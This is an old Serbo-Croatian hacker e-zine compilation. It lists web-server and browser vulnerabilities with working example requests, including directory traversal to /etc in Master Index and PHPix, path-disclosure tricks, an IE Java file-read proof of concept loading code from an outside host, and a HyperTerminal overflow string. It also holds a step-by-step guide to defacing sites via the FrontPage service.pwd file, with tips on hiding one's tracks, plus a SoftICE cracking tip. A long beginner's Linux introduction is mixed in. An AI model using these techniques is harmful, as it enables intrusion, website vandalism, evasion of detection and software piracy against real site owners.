Apache Web Server u stanje kad koristi ogromne CPU resurse. Da bi ovaj DDoS (distributed denial of service) uspeo, potrebno je napraviti puno simultanih konekcija. Ranjivi verzije Apache Web Servera su sve verzije pre 1.2.5 a ova

verzija 1.2.5 i novije su imune na ovakvu vrstu napada.Napad je krajnje jednostavan - dodaj te puno '/' u URL i Apache ce biti spreman da potroshi ogromne resurse dok ne procesira takav zahtev. Ako je ogroman broj ovakvih zahteva poslat u isto vreme na server, onda bi isti server mogao biti nedostupan !!! =============================================== ========= 8. PHP Path Revealing Vulnerability ------------------------------------------------------------Pomocu ovoga Vulnerability-ja, haker moze doci do informacije gde se nalazi direktorijum sa PHP podacima. Ovo se deshava na svim serverima na kojima je ukljucen error_reporting (prijava greshaka). Ranjivi su sistemi PHP 4.01 i noviji. Ovo shljaka tako shto kada u browser upishemo nepostojecu stranicu npr. www.server.com/he.php3 i server ce da prijavi Fatal Error i pokazace gde se direktorijum nalazi. Npr. evo jednog sluchaja: Fatal error: Unable to open /vhmap/i/n/server.com/he.php3 in - on line 0 No input File specified Reshenje ovog problema je iskljucivanje error_reporting-a, ali ovo reshenje moze da izazove i druge nezeljene posledice. =============================================== ========= 9. Sakrivanje IP broja u mIRCu ---------------------------------------------------Ovo uputstvo sam pisao po ugledu na mIRC 5.71 a isto je i za novije i starije verzije. Naime, treba uci u opcije i naci pod stavkom Connect izabrati Firewall. Tu treba chekirati 'Use SOCKS Firewall', za protokol treba izabrati 'Socks4', u 'Hostname' ukucaj 'interate.com.pe' i u 'Port' ukucaj '1080'. Posle ovoga Restartuj mIRC i onda cesh biti anoniman. Ovo ce ti mozda malo usporiti mIRC zato shto ce se sve obavljati preko kompjutera koji se nalazi u Americi, ali vredi. Ako hocete mozda neshto brze, potrazite proxy adrese za mIRC i isprobajte ih i nadjite sebi najbrzu. =============================================== ========= 10. Trik u SoftICE za crackere koji nisu znali -------------------------------------------------------------------------Ako radite u SoftICE-u i zelite da crackujete neku protekciju u programu, ja bih vam preporuchio da breakpoint postavite ovako: bpx hmemcpy

U 90% slucajeva naci cete se u samoj blizini protekcije u kodu, i uz malo iskustva moci cete da crackujete program. Ovo vazi za sledece protekcije: - Serial - Name/Serial - Name/Company/Serial i sl. =============================================== ========= ********************************************************** ***************** SADRZAJ: -----------------1. Master Index directory traversal vulnerability (translated by BaCkSpAcE) 2. PHPix 1.0.X directory traversal vulnerability (translated by BaCkSpAcE) 3. HTimage.exe vulnerability, part I (translated & modified by BaCkSpAcE) 4. Front Page Bug (written by BlackPhoeniX, modified by BaCkSpAcE) 5. IE 5.5/Outlook java security vulnerability (written by Georgi Guninski, translated by BaCkSpAcE) 6. HyperTerminal Buffer Overflow Vulnerability (written by USSR Security Advisory, translated by BaCkSpAcE) 7. Osnove Linuxa - Prvi deo (downloaded from hr site) 8. ALT 255 (written by BaCkSpAcE) =============================================== ======== 1. Master Index directory traversal vulnerability -------------------------------------------------------------------------------Pronadjena je greshka u Master Indexu koja dozvoljava kretanje kompletnim sistemom zrtve, uz dozvolu chitanja fajlovai foldera. Master Index je profesionalni pretrazivachki engine kao shto je Yahoo i AltaVista. Master Index moze biti pronadjen na adresi: http://www.armadastyle.com/masterindex.html. Master Index dozvoljava napadachu da prosurfuje kroz serverske

fajlove koristeci $catigory=_some_dir_variable. Pomocu ovoga je moguce prochitati bilo koji fajl ili folder sa privilegijama kao i httpd. Evo vam jedan primer: (Prvi i drugi red su spojeni) http://www.target.com/cgi-bin/search/search.cgi?keys=*&prc=any& catigory=../../../../../../../../etc Proizvodjac Master Indexa je informisan o ovom bugu. On je izjavio da sachekaju sledecu patchovanu verziju Master Indexa koja bude objavljena. =============================================== ======== 2. PHPix 1.0.X directory traversal vulnerability -----------------------------------------------------------------------------Pomocu ovog buga na Linux/Unix rachunarima sa PHPix 1.0.0 - 1.0.2 mozete prochitati bilo koji fajl ili folder na serveru. PHPix je Web-based foto album viewer napisan u PHP. PHPix Photo Album se oze downloadovati sa http://phpix.org. Pronadjena je greshka takva da napadach moze da pristupi svim fajlovima koristeci $mode=album&album=_some_dir_variable sa istim privilegijama kao i httpd. Evo jednog primera: (Oba donja reda su spojena) http://target.com/Album/?mode=album&album=..%2F..%2F..%2F..% 2F.. %2F..%2F..%2F..%2Fetc&dispsize=640&start=0 Reshenje ovog problema je downloadovanje nove patchovane verzije PHPix-a!!! =============================================== ======== 3. HTimage.exe vulnerability, part I ----------------------------------------------------------Pomocu ovog fajla (/cgi-bin/htimage.exe) koji dolazi uz FrontPage mozemo da vidimo ceo put do root direktorijuma. Evo jednog primera www.server.com/cgi-bin/htimage.exe?0,0 Ja sam probao PTT i pokaze da se root nalazi na E:\VirtualWWW\ptt za sajt PTTa. O ovome cemo nastaviti da pishemo u sledecem tutorialu. Reshenje je brisanje htimage.exe fajla ili prelazak na *nix, zato shto Windows serveri dozvoljavaju izvrshavanje exe fajla na serveru dok kod *nixa to ne moze. Ovo reshenje ce vaziti i za part2 i part3 o HTimage.exe vulnerability. =============================================== ======== 4. Front Page Bug ------------------------------FrontPage bug je rupa koju nemarljivi administratori cesto ostave na

svojim serverima. Ako trazimo takve stranice na altavisti cemo ih naci priblizno 10.000. Napisani su hiljade tekstova sa tematikom FP buga ali kako vidimo jos uvijek ima administratora koji su lenji da pogledaju ima li njihova stranica ovaj problem.Ovaj nacin je jedan od najjednostavnijih kojima se mozete posluziti kada zelite defacovati stranicu. Takodjer, ovaj nacin je dosta omiljen medju mladjom (citaj: neiskusnijom) hakerskom populacijom jer je vrlo lak za razumjeti i skoro svako ga moze nauciti, pa ga vecina iskusnijih hakera smtra lame-om, ali kao sto sam vec rekao, za hakere pocetnike ce biti dosta dobar jer je lak. I onda kada defaceate stranicu ipak ste d00d, ne morate nikom reci kako ste je defaceali ;) Jedini uvjet je da imate Win masinu i da imate FrontPage, a imate ga skoro 100 % jer dolazi standardno sa Internet Explorerom. Sve sto trebate uraditi je sledece: U nekom browseru upisite link:service.pwd ili _vti_pvt. Dobicete listu stranica sa fp bugom. Kliknite na neki od linkova i dobicete index od _vti_pvt foldera. U stvari _vti_pvt folder i jeste ahilova peta fp bug stranica, tacnije file koji se zove service.pwd. U tom file-u cete naci enkriptovan password. Sada ga samo trebate cracknuti. Tu ce vam najbolje posluziti neki uobicajeni password crack alat poput John The Rippera ili Cracker Jack-a. Nakon sto ste cracknuli password sve je fakticki vec uradjeno. Sada otvorite FrontPage i napisite nesto kao "J4 s4m n4j74j3b4n1j1 h4k3r n4 5v1j37u" ili nesto slicno tome i zamemorisite to kao index.html. Sada imate vise izbora kako postaviti vas index.html na stranicu - zrtvu. Prvi je da pokusate direktno iz FrontPage-a sa opcijem File --> Save As i onda upisete stranicu zrtvu. Kada vam zatrazi password upisitie vas cracknuti pass. Hint: Ponekad vas nece ni pitati za password pa pokusajte i to u krajnjem slucaju. Drugi nacin je da to uradite preko nekog FTP klijenta. naci imate index.html i pomocu FTP klijenta upoloadate njega na vasu zrtvu. Naravno kad zatrazi user i password upisite vas user i cracknuti password. Ovo rijesenje radi u 99 % slucajeva. Ono 1 % se desi ako je admin kojim slucajem promijenio pass, a ako je tako moracete ga ponovo cracknuti, ili recimo da ste nesto napravili pogresno i sada imate pogresan pass. I u tom slucaju ga cracknite ispocetka. Ima jos jedan nacin da uploadate vas index.html na zrtvu. Otvorite Windows Explorer i idite na apu zvanu "Web Folders". Tamo kliknite dva puta na "add webfolder" i upisite url vase zrtve. Ako upita za pass i user upisite ih a ako ne pita jos bolje (ovo se desava u 0,01% slucajeva). Sada imate vise opcija na izboru. index.html (zrtvina defaultna stranica) index.asp (neki file) default.html (neka stranica) default.asp (neki file) Jednostavni ih sve zamjenite sa vasim index.html Sada trebate pogledati vasu defaced stranicu. Budite sigurni da koristite proxy, a ako ne onda recite nekom prijatelju da ode pogledati, da vi nebi ostavljali svoj log na toj stranici, jer ce vas u tom slucaju lakse uhvatiti. Ako koristite ovu opciju sa Web Folders nekada cete dobiti poruku: File is already only, open? Otvorite je i obradite. Nemojte na ovaj nacin pokusavati otvoriti stranice sa nekih freeservera, nece vam raditi. Eh da jos nesto: Ako dobijete npr. www.server.com/osoba nemojte pokusavati haknuti ovo /osoba ako

nemozet haknuti www.server.com.Ima jedna stvar koja bi vam mogla zagorcati zivot. Naime ne kod svih passworda dobivenih preko FP buga ne mozete uploadovati preko ftp-a stranicu jer passovi za ftp i fp nisu isti. Ali to je dosta rijetko medjutim moze se desiti. Ako vam se desi pokusajte ostale metode ili trazite iducu zrtvu. =============================================== ======== 5. IE 5.5/Outlook java security vulnerability -----------------------------------------------------------------------Georgi Guninski je, kao shto vecina vas zna, jedan od najpoznatijih pronalazacha rupa u IE/Outlook.Evo sada jednog problema koji daje veliki rizik po onog ko koristi Microsoft Products. Ova rupa dozvoljava da ti server vrshi citanje fajlova i chitanje direktorijumske strukture posle pregleda web-stranice ili chitanja HTML poruke. Problem se javlja kada se specifira codebase za aplet koji se uchitava iz <OBJECT> taga i jar fajla.Evo pogledajte sledeci kod: <OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590> <PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavaco debase.jar"> <PARAM NAME="CODEBASE" VALUE="file:///c:/"> <PARAM NAME="URL" VALUE="file:///c:/test.txt"> </OBJECT> Ovaj kod setuje apletov codebase na file:///c:/ Ovo nije problem Java jezika i to nije problem u microsoftovom VM, vec je problem u codebase-u koji je setovan od strane IE. Izgleda da pomocu ove rupe mogu da se vrshi upis i izvrshavanje fajlova. Evo sledeceg koda koji ce vam pomoci: ---------javacodebase1.html------------------------------------------<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590> <PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar"> <PARAM NAME="CODEBASE" VALUE="file:///c:/"> <PARAM NAME="URL" VALUE="file:///c:/test.txt"> </OBJECT> -----------------------------------------------------------------------------gjavacodebase.java-------------------------------------------...... try { u = new URL(getParameter("URL")); InputStream is=u.openStream(); byte ba[]=new byte[1000]; int l=is.read(ba); InputStream os=u.openConnection().getInputStream(); String s1=new String(ba,0,l);

print(u.toString()); print(s1); } ....... ---------------------------------------------------------------------Microsoftu je javljeno za ovaj problem 14.10.2000 i rekli su da josh uvek rade na tom patchu. Ako ste zainteresovani idite na sajt microsofta pa se informishite! =============================================== ======== 6. HyperTerminal Buffer Overflow Vulnerability -----------------------------------------------------------------------------Sistemi koji podrzavaju ovaj problem su Windows 2000, Windows ME, Windows 98 i Windows 98SE. Ova rupa dozvoljava da se uradi buffer overflow u HyperTerminal Telnet Clientu i moze da dozvoli napadacu da izvrshi neki kod na drugom sistemu. Ako korisnik otvori HTML poruku koja ima ovaj HTML kod, onda ce isti korisnik da nastrada. Evo vam primera: telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/ Patchovi: Windows 98 i 98SE http://download.microsoft.com/download/win98/Update/12395/W98/ EN-US/274548USA8.EXE Windows ME http://download.microsoft.com/download/winme/Update/12395/Win Me/ EN-US/274548USAM.EXE Windows 2000 (problem se otklanja instaliranjem Service Packa br.1) http://www.microsoft.com/downloads/release.asp?releaseid=25112 =============================================== ======== 7. Osnove Linuxa - Prvi deo -----------------------------------------------Linux? Sta je to? Treba li to ikome? Cemu sluzi? Valja li to? Radi li to pod Windowsima? I jos hiljade pitanja o Linuxu. Sta je, zaista Linux? Treba li vam? Mozete li ziveti bez njega? Zasto uopse citate ovaj umetak? Hocete li nesto nauciti ili cete samo izgubiti vrijeme? Vec nekoliko godina koplja se lome oko Linuxa. Suprotstavljene su dve

struje - jedna je velika grupa vernih korisnika Microsoftovih proizvoda koja Linux smatra promasajem, a druga je mala grupa zadovoljnih korisnika Linuxa. Najcesce stvari koje se Linuxu zameraju je "nekompatibilnost s Windowsima" i nedostatak programske podrske. Obe su tvrdnje netacne. Prva je, zapravo, poluistinita - Windowsi ne mogu vrtiti niti jedan program pisan pod Linuxom, ali Linux moze vrtiti neke programe pisane pod Windowsima. Druga tvrdnja je tvrdnja o nedostatku programske podrske. Iako je dostupno na stotine megabajta programa koje je Linux ili nasledio ili su to potpuno novi programi, nepostojanje MS Office paketa za Linux obino nepoznavatelje i kvazistrucnjake asocira na siromastvo. No, ostavimo igranje advokata za neku drugu priliku, u ovom umetku imat ete prilike upoznati Linux iznutra, to on stvarno jest i o emu se uope radi. Prije nego nastavite, svakako uinite uslugu sebi (ne meni, niti susjedu, niti prijateljici) - ako nikad prije niste imali priliku instalirati Linux OBAVEZNO prvo proitajte umetak do kraja da biste dobili dojam o emu se pria i o kakvoj se instalaciji uope radi. Tek onda moete kroz upute za instalaciju ii korak po korak. Ne zaboravite da je cijela pria o Linuxu daleko, daleko obimnija nego ju moe ispriati ovaj umetak - zato e biti obraene samo zbilja najosnovnije stvari, no kad ve nauite ovo osnovno, ostalo e ii lake. Zato se od itatelja oekuje i poznavanje rada raunala i barem operativnog sustava DOS jer e mnoge stvari biti objanjene usporedbom s DOSom. Linux je operativni sustav. Operativni sustav (krae: OS) je najnia softverska stepenica u vaem raunalu. OS je ono pod im vai programi rade i ono to se brine o svim potrebama programa. Najpoznatiji operativni sustavi na PC platformi su MS DOS, Windows95 i Windows NT. Windowsi 3.1 nisu operativni sustav ve je to samo grafiko okruje koje radi pod operativnim sustavom MS DOS. Windows95 je pomalo hibridan OS koji nudi i grafiko okruje i komandnu liniju kao ranije verzije MS DOSa, dok je Windows NT pravi operativni sustav. Linux je po svojim svojstvima najsliniji Windows NT operativnom sustavu kao i NT, Linux ne vue za sobom nikakvo staro naslijee (poput DOS-a), i kao i NT, Linux je u potpunosti 32-bitni OS (za razliku od DOS-a i Windowsa 95 koji imaju i 16-bitnog naslijea). No, za razliku od Microsoftovih produkata koji svi imaju neke zajednike spone i zajedniki vizualni identitet, Linux je jedan od operativnih sustava izraslih oko dosta stare UNIX arhitekture. Jedna od karakteristika tih operativnih sustava na koje obino nisu

navikli oni koji rade pod Microsoftovim operativnim sustavima je striktno razlikovanje velikih i malih slova. Imate li dvije datoteke na disku, jedna se zove "Pismo", a druga "pismo" - te dvije datoteke e biti prihvaene kao razliite, jer se razlikuju u poetnom slovu. Jedno je veliko a drugo malo. Tako i naredbe - sve se naredbe piu malim slovima. Dogodi li vam se da sluajno napiete naredbu velikim slovima Linux je nee prepoznati. Moda e vas u poetku dovoditi u nedoumicu ako nekom programu moete dati argumente "-r" i "-R" koji su u biti isto slovo (zanemarimo li to je jedno veliko a drugo malo) a rade razliite stvari. No malo samodiscipline e vas nauiti da piete naredbe malim slovima i da tako komunicirate s raunalom UMJESTO DA VIETE NA NJEGA VELIKIM SLOVIMA. Iako je Linux vrlo liberalan glede znakova koje smijete upotrebljavati za nazive datoteka, izbjegavajte upotrebu naih slova. Je li Linux onda samo jedan od UNIX-a? Linux ipak nije Unix. Da bi jedan OS imao pravo nazivati se Unixom mora zadovoljiti odreene uvjete, a Linux zasad zadovoljava samo par njih, no i to je dovoljno da ga se smatra lanom Unix zajednice. Idejni tvorac Linuxa je Linus Torvalds (torvalds@linux.cs.Helsinki.FI) koji je prije nekoliko godina zapoeo projekt potpuno besplatnog operativnog sustava. Zahvaljujui Internetu i ogromnoj koliini entuzijazma sa svih strana svijeta, Linux je postao ono to je danas i to e u budunosti biti. Linux je, dakle, samostalan, besplatan OS. To prije svega znai da za koritenje Linuxa nikom ne trebate platiti, to je potpuno besplatan OS. Zatim, samom injenicom da je rije o operativnom sustavu a ne "obinom" programu, Linux nije mogue pogoniti iz DOS-a ili Windows-a, jer je Linux u stvari zamjena za DOS i Windows-e. Oni mogu koegzistirati na disku, ali ne mogu u isto vrijeme imati vlast nad raunalom. Tj, na raunalu moete raditi ili pod Windowsima ili pod Linuxom, nikad istovremeno. Istina postoje za Linux emulatori koji omoguuju startanje DOS ili Windows programa, ali se oni i dalje izvravaju pod Linuxom kao OS-om. Linux moe biti smjeten na istom disku na kojem je ve instaliran DOS ili Windows, ali moe biti i u zasebnoj particiji. Svaki od ta dva naina instaliranja ima svoje prednosti i mane. U prvom sluaju, kad Linux instalirate na ve formatizirani disk s FAT tablicom neete morati fdiskom mijenjati disk, praviti nove particije i slino. No, nee se sve distribucije dati instalirati na FAT particiju. U drugom sluaju, kad Linux instalirate na njegovu vlastitu particiju, podaci s te particije dostupni su samo Linuxom, ne i DOS-om (osim uz pomo posebnih programa). No dobit je viestruka: na svojoj osobnoj particiji Linux se ponaa

udobnije, sigurnije i viestruko je bri nego na FAT particiji. Uglavnom, jednom instaliran Linux moi ete podii ili prilikom paljenja raunala, kad e vas poseban program koji Linux instalira pitati elite li podii Linux ili neki drugi OS (DOS, Windows). Ako iz nekog razloga ne instalirate taj program, moi ete iz DOS-a (i Win95, ne i iz Win NT) malim programiem ugasiti OS na kojem trenutno radite i podii Linux. Jednom podignut Linux javit e se pozdravnom porukom i promptom "Login:". Obicno u tekstualnom modu, ali elite li tako, Linux odmah po podizanju moe prijei u svoje grafiko okruje (XWindows, skraeno X). Ovaj OS moete po vlastitoj elji koristiti u tekstualnom i u grafikom modu, pri emu se osnovna funkcionalnost operativnog sustava ne razlikuje previe ovisno o tome radite li u grafikom ili tekstualnom nainu rada. Spomenuo sam "Login:" prompt s kojim se vjerojatno dobar dio itatelja ve susreo. Kako je Linux viekorisniki OS, pri svakom zapoinjanju posla potrebno se predstaviti raunalu, rei "ja sam taj i taj", da bi raunalo znalo s kojim korisnikom ima posla i da bi mu uinilo dostupnim njegove podatke, a nedostupnim tue podatke. Ne, ne morate biti shizofrenik da biste koristili multikorisnike mogunosti Linuxa. Linux jednako radi i s samo jednim korisnikom na stroju kao i kad ih ima desetak i svi istovremeno rade. To mu omoguuje ugraeni multitasking. Viekorisniki stroj je svaki stroj koji dozvoljava rad vie korisnika na istom stroju. Za razliku od MS DOS-a i starih Windows-a koji su pretpostavljali da je vlasnik raunala istovremeno i jedini korisnik, Windows NT, Linux i mnogi drugi OS-ovi pretpostavljaju da vlasnik raunala nije jedini korisnik stroja, ve da stroj mogu koristiti i druge osobe. Pri tome nije bitno da li oni raunalu pristupaju istovremeno ili jedan po jedan. Isto tako, nije vano pristupaju li raunalu s udaljenog terminala ili direktno na raunalu (u tom sluaju govorimo o "konzoli"). Jedna od karakteristika viekorisnikog stroja je zatita podataka. Zamislimo primjerice da ste na vae raunalo instalirali Linux. I vi u njemu radite, ali upada vam u sobu brat/sestra/mu/ena i kae da mu/joj treba raunalo za obaviti neke poslove. Pristanete li, va jednokorisniki Linux tad poinje pokazivati svoje viekorisnike prednosti: dajte Linuxu do znanja da e jo jedna osoba koristiti raunalo (struno bi se to reklo napravite novi account na raunalu), a Linux e sam brinuti o tome da ta osoba ima sve potrebno za rad, ali e pri tome paziti i da ta osoba, primjerice, ne moe pristupati vaim podacima ve samo onima koje joj dozvolite. Isto tako, podaci te osobe bit e zatieni od vaeg pogleda (ili pogleda neke tree osobe). Uzajamno si isto tako neete moi mijenjati ili brisati podatke. Dodatno, ta druga osoba uope ne mora sjediti za vaim raunalom - ona se moe modemom, mrenom karticom ili na neki trei nain povezati s vaim raunalom i s nekog drugog mjesta (druge

sobe, druge zgrade ili drugog kraja svijeta) raditi kao da sjedi u vaoj sobi za vaim raunalom. Ideja viekorisnikog stroja je, dakle, napraviti takvu okolinu u kojoj e svatko, bez obzira gdje se nalazi i da li za vaim raunalom netko ve radi, moi pristupiti raunalu i raditi kao da sjedi za njim. Pri tome e imati jedan dio diskovnog prostora samo za sebe, koji e biti zatien od nepoeljnih, ali e moi bez ikakvih ogranienja dijeliti eljene datoteke s drugim osobama. Multitasking je sposobnost operativnog sustava (ne raunala nego ba operativnog sustava) da izvrava vie programa odjednom. Iako ulazei dublje u analizu multitaskinga neizbjeno dodirujemo podruje multiprocesorskih raunala, za ugodan multitasking dovoljno nam je i raunalo s jednim procesorom. Multitasking, dakle, ne ovisi o raunalu niti o procesoru, ve o operativnom sustavu koji koristite. Tako primjerice Amiga i Macintosh raunala imaju OS od samog poetka raen s idejom multitaskinga, dok PC raunala imaju vrlo arenu ponudu operativnih sustava s nekoliko razliitih mogunosti multitaskinga. Poevi jo od starog MS DOS-a, koji nikad nije bio zamiljen kao OS s mogunostima multitaskinga, preko Windows 3.x serije koja je "dodavala" DOS-u mogunost izvravanja vie programa istovremeno (ili nekih programa nezavisnih proizvoaa, poput DesqView-a), sve do Win95 i WinNT koji u raunalo uvode kvalitetne multitasking mogunosti. U igri je ak i Calderin OpenDOS, kopija MS DOS-a koja ima ugraen multitasking. Za razliku od OpenDOS-a i Windowsa, Linux od samog svog nastanka radi kao multitasking OS koji za sobom ne vue potrebu za kompatibilnou s starijim verzijama. Mo multitaskinga najbolje ete osjetiti radite li imalo zahtjevnije poslove za raunalom. Trebate li raunalo samo da biste na njemu izvravali jedan program (Word, bazu podataka, program za crtanje..) onda vam multitasking i nije pretjerano koristan (iako je zgodno odigrati Solitaire dok baza traga za podacima). No, trebate li istovremeno pokrenuti nekoliko programa, multitasking je jedino rjeenje. Primjerice, osoba iz prethodnog poglavlja ba mora taj as napisati neki dokument dok vi radite ozbiljne stvari na raunalu (Doom i slino). Vee li se preko terminala moi e bez problema uraditi svoj posao dok se vi zabavljate. Pri tome neete zasmetati jedno drugome, niti ete imati potrebe razmiljati da li jo tko osim vas radi na raunalu - Linux sam brine o opsluivanju oba korisnika. Linux je dosta skroman po izboru hardwarea na kojem eli raditi. Zavrtjeti ga moete i na 386SX raunalu s 4MB memorije i Hercules video karticom. Iako je to takorei zastario procesor, na njemu Linux radi jednako kao i na 486 ili Pentium procesoru - razlika je jedino u brzini izvravanja

programa. Nekakav logian minimum bilo bi 486 raunalo s 8MB memorije, na kojem se Linux dosta ivlje ponaa, i to je najmanja konfiguracija u kojoj moete relativno ugodno raditi u XWindows suelju (Linuxovo grafiko suelje, zapravo uobiajeno grafiko suelje Unixa). Ve s 16MB memorije Linux se osjea komotno, a s jaim procesorom i vie memorije moete samo profitirati. Linux ne pati toliko na procesor koliko na memoriju, pa ete dodavanjem vie memorije bolje profitirati nego stavljanjem novog procesora. Osobito imate li manje od 8MB memorije u raunalu. Diskovni prostor je gotovo jednako tedljiv. Neke od Linux distribucija su gotovo u cijelosti raene tako da se mogu pokretati s CD-a, pa je sve to trebate uiniti - staviti CD u ita i pokrenuti Linux, koji e za svoje najminimalnije potrebe (ne vie od nekoliko megabajta prostora ako ne trebate swap datoteku) koristiti DOS particiju, a najvei dio Linuxa bit e uitavan s CD-a. najmanja "normalna" instalacija Linuxa na disk bila bi oko dvadesetak MB. Unutar tih 20-tak MB moete smjestiti sve najosnovnije stvari, ukljuujui tu i C prevodilac. Moete instalirati i neku iz serije "MiniLinux" distribucija, koje zauzimaju ak i manje prostora. Dakako da s tako "osakaenim" Linuxom neete imati sve prednosti koje vam prua kompletnija distribucija, koja bi zauzela od 50 do 500MB prostora na disku, ovisno o eljama i potrebama. Nekakva srednja vrijednost bila bi 100-150MB prostora za ugodan rad s paljivo biranim alatima. Grafika kartica moe biti bilo koja VGA kartica, ak i CGA, EGA ili Hercules. Imate li negdje u pranjavom podrumu Hercules karticu i monitor moete i nju staviti u raunalo, a Linux e ju moi iskoristiti. Pristup vaeg Linux raunala svijetu ostvarivat ete obino jedan od ova dva naina: Ethernet karticom ili modemom. Zato je neophodno imati jedno od to dvoje. S Ethernet karticama nema problema, podrano je sve na to u normalnim uvjetima moete naii. Modem isto tako moe biti bilo koji, vanjski ili ugradivi. Ali ako moete izbjegavajte P&P podrku - iskljuite ju na svakoj kartici koju moete iskljuiti, utedjet ete si dosta vremena oko konfiguriranja raunala i traenja greaka. Poeljno je, uglavnom zbog problema pri instalaciji, imati ATAPI CDROM. Razlika izmeu ATAPI i ostalih pogona je to se ATAPI pogoni veu na HDD kontroler, kao disk. Ostali se obino veu na neku karticu u raunalu. Nemate li ATAPI CD-ROM, nemojte oajavati, Linux e vjerojatno prepoznati i va. Ako ga ne prepozna, morat ete mu runo objanjavati koji pogon imate u raunalu.

Zvune kartice znaju praviti probleme s Linuxom. U principu je to samo pitanje rasprostranjenosti zvune kartice. Za Linux ete vrlo rijetko nai upravljake programe (drivere, u sluaju Linuxa module) za zvunu karticu koje je radio proizvoa te kartice; u najveem broju sluajeva podrku rade sami korisnici kartice. To nipoto ne znai da su takvi programi manje kvalitetni ili manje pouzdani - esto su manji, bolji i bri od onih koje za istu tu karticu ali drugi OS isporuuje proizvoa. Ako je vaa zvuna kartica rijetka, vjerojatno neete lako nai podrku za nju, ali ako je imalo poznatija - podrku ete sigurno imati. "Kompatibilne" kartice esto zbog svoje nesavrene kompatibilnosti imaju problema s podrkom za karticu koju emuliraju, ali i za njih postoje neka generika rjeenja. U biti, dosta mali broj zvunih kartica nabavljivih u trgovinama nema podrku u Linuxu. Za razliku od DOSa ili Windowsa, Linux nije ogranien na jednu jedinu distribuciju. Sjetimo se, Linux je besplatan operativni sustav koji moete cjelokupnog dobiti u source-u. No, distribucije se (i) plaaju. Zato je tako? Postoji vie razliitih distribucija, koje svaka u osnovi imaju besplatan Linux, a neke osim njega imaju i posebno pisane programe. Kupujui distribuciju, ne plaate Linux, ve plaate trud autora distribucije da skupe programe i sloe ih na CD, a u nekim sluajevima plaate i posebne programe koji dolaze uz distribuciju a koji nisu besplatni. Bitne razlike u distribucijama nema, niti su one meusobno "nekompatibilne". Rije je o jednom te istom Linuxu koji je isporuen s vie ili manje dodatnih programa, ili s nekim posebnim dodacima, ovisno o distribuciji. Dakle, ne moete pogrijeiti odluite li se za ovu ili onu distribuciju, uvijek ete na kraju dobiti isti rezultat - Linux. Za koju se distribuciju odluiti? elite li besplatnu distribuciju, moete ju skinuti s Interneta (ili instalirati Slackware s PC Chipovog CD-a), a komercijalne trebate naruiti. Tri najpoznatije i najomiljenije distribucije su Slackware, RedHat i Debian. Sve tri nabavljive su preko Interneta i ne trebate plaati za njih. Dok je Slackware neka vrst legende i mjerila za druge distribucije, RedHat i Debian su omiljene zbog mnogih korisnih sitnica, primjerice vrlo laganog biranja koje aplikacije elite instalirati i koje maknuti, te mogunosti gotovo automatskog upgrade-a preko Interneta. Komercijalne distribucije nude najrazliitiji izbor, esto na vie od jednog CD-a. Svaka od njih ima svojih prednosti - morate li ba kupiti komercijalnu distribuciju, birajte onu koja najbolje zadovoljava vae potrebe. Ako ste poetnik, nemojte odmah skakati na komercijalnu distribuciju - instalirajte za poetak neku besplatnu, iivljavajte se na njoj dok ne nauite malo vie o Linuxu i kad barem malo uete u bit tog OS-a bit e vam puno lake odabrati komercijalnu distribuciju. Sve konfiguracije mogue je instalirati s CDa, a instaliranje s diskete podravaju Debian, Linuxware, RedHat, Slackware i WGS Linux Pro; FTPom je mogue nabaviti Craftworks, Linuxware, RedHat, Slackware i WGS; s lokalnog diska (nekog poddirektorija na disku) mogue je instalirati sve distribucije osim Linuxware i Yggdrasil; trebate li Linux na traci ili

Syquest disku morat ete se zadovoljiti Craftworks distribucijom. Programi za administriranje sustava mogu biti ili tekstualni (OpenLinux, Craftworks, Linuxware, S.u.S.E., Slackware) ili grafiki (OpenLinux, Debian, RedHat, WGS..). Razlike u funkcionalnosti nema, ali su grafiki programi pregledniji i intuitivniji. Volite li imati i tehniku podrku, imat ete ju kupite li OpenLinux, Craftworks, Linuxware, S.u.S.E., WGS, YGGDRASIL ili komercijalnu RedHat distribuciju. U ostalim sluajevima "osueni" ste na esto efikasniju i kvalitetniju podrku - UseNet grupe comp.linux.* - gdje moete postaviti 8pitanje i uglavnom ete brzo doekati odgovor (ili flame). Ne govorite li engleski, pitanja moete postaviti i u domae grupe - hr.comp.linux ili hr.comp.unix. =============================================== ======== 8. ALT 255 ------------------Da li ste ikada pozeleli da napravite direktorijum kojem skoro niko ne moze prici. Pa evo od ovoga trenutka mozete ispuniti svoju zelju. Idite u Dos prompt i dodjite u ROOT direktorijum, tj. otkucajte CD\ i onda lepo otkucajte MD (ALT + 255). Znaci otkucajte MD pa SPACE pa onda drzite ALT i otkucajte 255 na desnoj strani tastature i zatim pustite ALT i pritisnite Enter.I onda lepo napisete CD i opet stisnete ALT i otkucate 255 na desnoj strani i pustite ALT i enter. Sada mozete u taj direktorijum stavljati sta god pozelite i ne moze vam tu niko pristupiti sem nekih malo pametnijih. Ovo svakako isprobajte. Zaboravih da kazem, ako zelite da obrisete taj direktorijum ukucajte RD ili RMDIR pa onda SPACE pa drzite ALT pa otkucajte 255 i onda pustite ALT i pritisnite ENTER.Najbolja fora koju ja koristim jeste da napravite direktorijum po sledecem postupku: otkucajte MD pa onda pritisnite ALT i otkucajte 255 i onda pustite ALT i u nastavku otkucajte nesto proizvoljno npr. backspace i onda ce vam se stvoriti zasticeni drektorijum koji se zove backspace.Ovo je jedna od nesuglasnica DOSa i WINDOWSa. Ovo se desava zato sto je kod ALT+255 ustvari NULL to jest praznina i Windows to ne moze da gleda kao znak i zato ne moze da pristupi tom direktorijumu. Ovo je isprobano i nijedan program iz Windowsanije uspeo da pristupi tom direktorijumu, dok na drugoj strani skoro svi programi za dos uspeli su da pristupe tom direktorijumu i chak da ga obrishu.

WEB HACK

_-SADRZAJ-_

-Objasnjenje -Kad ovo procitas... -Sta je potrebno -Kako ostati anoniman? -Shell Account...? -Malo osnovnih Unix komandi -Nalazenje informacija o siteu -Iskoristiti rupu -Ostalo

